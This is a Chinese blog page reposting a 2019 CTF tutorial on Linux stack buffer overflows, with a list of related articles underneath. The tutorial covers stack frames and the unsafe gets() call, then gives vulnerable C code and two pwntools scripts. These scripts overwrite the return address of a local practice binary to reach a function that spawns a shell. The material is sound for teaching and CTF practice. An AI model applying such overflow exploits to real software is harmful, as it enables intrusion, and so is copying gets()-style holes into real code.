Linux栈溢出漏洞原理,盘它!PWN栈溢出漏洞。

最新推荐文章于 2024-07-08 12:28:19 发布
最新推荐文章于 2024-07-08 12:28:19 发布
阅读量477 收藏 1
点赞数
文章标签: Linux栈溢出漏洞原理

本帖最后由 yanzm 于 2019-2-20 10:43 编辑

在国内的CTF比赛中,PWN题最常见考点就是缓冲区溢出漏洞,而缓冲区溢出代表就是栈溢出漏洞。

0x01 基础知识

栈是一种先进后出的数据结构,从高地址向低地址增长的内存结构。

函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等,是系统栈的一部分。

在一次函数调用中,函数调用栈中将被依次压入:函数实参、返回地址、EBP。如果函数有局部变量,接下来就在栈中开辟相应的空间以构造变量。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

变量.webp.jpg (20.25 KB, 下载次数: 6)

2019-2-20 10:16 上传

ESP 称为栈顶指针,用来指示当前栈帧的顶部。

EBP 称为栈基址指针,用来指示当前栈帧的底部。

0x02漏洞原理

栈溢出漏洞是由于使用了不安全的函数,如C中的 read(fd, buf, nbytes)、gets(s)等,通过构造特定的数据使得栈溢出,从而导致程序的执行流程被控制。

当程序代码如下时:

int main(int argc, char **argv) {

char s[12];

gets(s);

return 0;

}

栈空间如下:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

如下.webp.jpg (17.42 KB, 下载次数: 5)

2019-2-20 10:17 上传

当构造变量char s[12]时,系统就在栈中给s开辟栈空间,可gets(s)函数未限制输入字符长度,可以构造大量的数据来超出变量的空间从而造成溢出,覆盖到s以上的栈空间。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

s.webp.jpg (17.54 KB, 下载次数: 3)

2019-2-20 10:18 上传

0x03 解题步骤

8f3ff2fbfdd7c7c8339951a6542705fa.gif

步骤.webp.jpg (24.8 KB, 下载次数: 3)

2019-2-20 10:18 上传

例举一道栈溢出的PWN题,根据解题步骤来解答。

1. 逆向工程:

将PWN题拖入IDA,点击程序入口函数。按F5逆向main函数,查看对应的C伪代码。

main函数调用vulnerable()函数。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

函数.webp.jpg (52.06 KB, 下载次数: 3)

2019-2-20 10:19 上传

点击进入vulnerable()函数并F5逆向。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

F5.webp.jpg (40.47 KB, 下载次数: 7)

2019-2-20 10:30 上传

vulnerable()函数中调用了gets()和puts()函数,而程序的逻辑就运行main函数和vulnerable函数。

vulnerable函数功能:输入字符串,输出字符串

程序中主要函数有

内置行数:gets、puts、system

自定义函数:main、test、success

2. 分析代码:

进行逆向工程拿到C伪代码,代码大致如下:

#include

#include

void success() {

puts("You Hava already controlled it.");

system("/bin/sh");

}

void test() {

puts("Connection Successful.");

}

void vulnerable() {

char s[12];

gets(s);

puts(s);

return;

}

int main(int argc, char **argv) {

vulnerable();

return 0;

}

gets() 是一个危险函数,因为它不检查输入字符串的长度,而是以回车来判断是否输入结束,所以很容易导致栈溢出。

3. 漏洞利用:

查看程序的保护机制:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

保护.webp.jpg (28.57 KB, 下载次数: 8)

2019-2-20 10:31 上传

程序在无任何保护的情况下进行解题:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

解题.webp.jpg (7.63 KB, 下载次数: 4)

2019-2-20 10:31 上传

输入s的值溢出到返回地址,将返回地址替换成text函数的起始地址。

查看text函数的起始地址。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

起始.webp.jpg (7.09 KB, 下载次数: 5)

2019-2-20 10:32 上传

EBP与EBP的距离14H,而栈中的EBP占栈内存4H,所以要覆盖到放回地址需要18H。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

18H.webp.jpg (19.81 KB, 下载次数: 3)

2019-2-20 10:37 上传

编写脚本如下:

from pwn import *

sh = process('./Ezreal1')

success_addr = 0x080491DE

payload = 'a' * 0x18 + p32(success_addr)

print p32(success_addr)

sh.sendline(payload)

sh.interactive()

利用脚本后的栈结构如下:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

利用.webp.jpg (13.75 KB, 下载次数: 5)

2019-2-20 10:37 上传

所以当函数调用完毕后,执行返回地址时将执行text函数。

运行脚本,成功运行text函数:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

成功.webp.jpg (23.35 KB, 下载次数: 5)

2019-2-20 10:38 上传

4. getshell:

分析代码发现程序中有getshell函数,这时就不需要构造shellcode,直接溢出返回地址,让程序执行此函数。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

执行.webp.jpg (20.66 KB, 下载次数: 3)

2019-2-20 10:40 上传

查看success函数地址:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

查看.webp.jpg (39.19 KB, 下载次数: 6)

2019-2-20 10:41 上传

脚本如下:

##!/usr/bin/env python

from pwn import *

sh = process('./Ezreal1')

success_addr = 0x080491A2

payload = 'a' * 0x18 + p32(success_addr)

print p32(success_addr)

sh.sendline(payload)

sh.interactive()

运行脚本,成功拿到shell:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

拿到.webp.jpg (26.08 KB, 下载次数: 3)

2019-2-20 10:42 上传

0x04 小小总结

本期的介绍就到这里啦!祝各位周末愉快!下期将带来在程序开启不同栈保护机制要如何利用漏洞。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

qrcode_for_gh_223e082fe8a7_344.jpg (12 KB, 下载次数: 5)

2019-2-20 10:42 上传

刘浚嘉
关注
PWN基础5:格式化字符串漏洞(一) 概述 及 调试
prettyX的博客
07-09 730
漏洞概述 在C语言中,常用的输出函数有printf、fprintf、vprintf、vfprintf、sprintf等。对于这些输出函数,Format String是其第一个参数,一般称之为格式化字符串 格式化字符串在输出函数中的解析过程: ...
linux pwn栈溢出漏洞原理
weixin_45948183的博客
03-24 551
学习栈溢出首先了解一下linux pwn常见的保护 》RELRO 部分RELRO: 将.got段映射为只读(但.got.plt还是可以写) 重新排列各个段来减少全局变量溢出导致覆盖代码段的可能性. 完全RELRO: 执行部分RELRO的所有操作. 让链接器在链接期间(执行程序之前)解析所有的符号, 然后去除.got的写权限. 将.got.plt合并到.got段中, 所以.got.plt将不复存在....
PWN-栈溢出漏洞
qq_42526420的博客
02-27 306
PWN-栈溢出漏洞 ret2text 信息搜集阶段 checksec re2text弄清楚保护机制 checksec的使用 file ret2text 静态分析 Q:IDA作为静态分析工具怎么可以计算出get_shell的虚拟地址? ​ 大概是因为这个文件没有开启ALSR技术,因此仅仅凭ELF文件本身信息尽可以推断出加载到内存的情况! vullnerable函数中的局部变量buf数组在IDA中给出了其在栈帧中的位置[ebp-10h],这个建议 有时准有时不准,保险起见这里要经过动态
9.pwn 栈溢出(基本ROP)
最新发布
2301_80361487的博客
07-08 881
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息栈溢出可以导致控制流劫持。
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2098
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 795
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
linux 溢出漏洞,Linux-glibc溢出漏洞(CVE-2015-0235)
weixin_32596769的博客
05-16 322
漏洞说明由于glibc 2.18之前版本中有函数存在溢出漏洞,当有程序调用gethostbyname*()时,有可能会被利用触发执行当前用户权限的任意代码。受影响的Linux版本比较多,如Centos 6、Ubuntu 12等版本。漏洞影响范围比较大,但想利用漏洞相对是比较困难,前提是有程序调用以上函数被触发或有权限去执行。不过如果检测存在漏洞还是建议大家进行修复,可以使用下面程序进行检测。漏洞检...
浅析栈溢出原理
热门推荐
najdhdfh的博客
10-20 1万+
函数的调用 准备工具: linux系统 调试工具gdb gdb插件:pwndbg 关于pwndbg插件可以在github搜索并下载安装,需要python环境 工具准备好之后,来看一段简单的代码,我们将通过调试分析这段简单的代码来理解函数在被调用前后都做了哪些操作. #include<stdio.h> int add(int a, int b){ return a + b; } int main(){ int num = add(1,2); printf("resu
二进制漏洞挖掘之栈溢出-开启PIE
ylcangel的专栏
10-18 3608
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1913
一个小白的慢慢理会过程
Linux栈溢出获取shell之Return to libc
d3f4ult的博客
04-10 771
文章目录简介参考资料知识铺垫 简介 本次实验将通过hackthebox的Enterprise的靶机来学习利用Return-to-libc实现Linux栈溢出并获取shell。在实验的过程中,遇到了很多的理论问题,百度后发现国内关于Return to libc的理论比较少,基本都是这种操作:system+exit+sh,却没有讲为什么,尤其是system后面为什么一定要跟exit。 参考资料 《0...
linux下使用栈溢出解决漏洞
hhyukJae的博客
09-20 491
1.关闭堆栈保护机制,打开堆栈可执行机制(64位系统下进行32位的编译,加-m32) 并进行运行测试 2.使用gdb调试 3.设置断点,动态+静态 运行程序,输入“AAAA” 4.单步运行,查看控制流,esp和ebp 5.function2的栈顶 6.覆盖 ...
linux缓冲区溢出漏洞简介
黑白之道
02-20 543
实验过程:1:安装32位编译工具 lib32z1 libc6-dev-i386,关闭地址空间随机化2:安装编译器zsh并替换sh指向的/bin/bash(因为sh具有保护欺骗性uid程序在整个运行中不保持root权限)3:shellcode(汇编码字节填充,一共64字节)4:su权限编译stack.cFopen(“badfile”,r)badfile必须存在,也就是我们先运行exploit.c生成
pwn刷题num23----栈溢出
tbsqigongzi的博客
04-26 162
BUUCTF-PWN-jarvisoj_level0 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 未开启RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下 程序首先用write函数输出了一个Hello,World,又调用了一个函数 明显的栈溢出,buf占0x80字节,而read函数要读取0x200字节,可以覆盖返回地址
浅谈栈溢出漏洞利用技术——学习笔记
楠木种子的三亩地
01-27 1382
文章目录基础知识寄存器:重要寄存器栈:一种先进先出的数据结构函数调用栈溢出的保护机制栈上的数据被当做指令来执行让攻击者难以找到shellcode地址检测Stack Overflow(栈溢出栈溢出的利用方法现代栈溢出利用技术基础:ROPCTF中ROP技术的常见套路利用signal机制的ROP技术(SROP)没有binary怎么办(BROP)BROP的目标BROP的条件劫持栈指针(Stack Piv...
PWN入门系列(2)栈溢出
小心信科理化声
12-02 1480
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
栈溢出漏洞
qq_35426012的博客
12-24 1243
栈溢出主要步骤: 1找到有溢出的位置 2找到跳板的位置,如jmp esp或ret 3把跳板的位置写到覆盖的返回值上,这样的话就会执行跳转指令 此时刚好eip等于你写的shellcode 概念 栈溢出:一些不安全的函数,在接受缓冲区时,在不检查的情况下,所以可以利用这点溢出到栈返回地址的地方,执行自己的代码。 fscanf:%s导致溢出 strcpy:数组定义太小也会溢出 跳板:jmp esp借...
栈溢出漏洞攻击原理及防护技术
wei.zhou的专栏
08-12 8156
文/H3C攻防研究团队 现阶段的安全漏洞种类很多,包括大家熟悉的SQL注入漏洞、缓存溢出漏洞、XSS跨站脚本漏洞等。而栈溢出漏洞作为缓冲区溢出漏洞的一种特定的表现形式,在现实网络环境中比较普遍。本文将从栈溢出漏洞原理、攻击形式及防护方法等方面进行介绍 一、 栈溢出漏洞原理 栈溢出(Stack Overflow)是在网络与分布式系统中被广泛利用的一种漏洞类型。在汇编中,以线程为线索的指令执
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 826
windows系统中内存漏洞中关于栈溢出的部分
NJUPT PWN入门:理解栈溢出原理与利用方法
本文将深入探讨栈溢出的基本原理及其在Linux和Windows环境下Pwn技术中的应用。 栈溢出是指程序试图在栈内存中存储的数据超过了该变量预留的空间,这可能导致栈帧中其他变量的位置被覆盖,进而破坏程序的正常流程。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值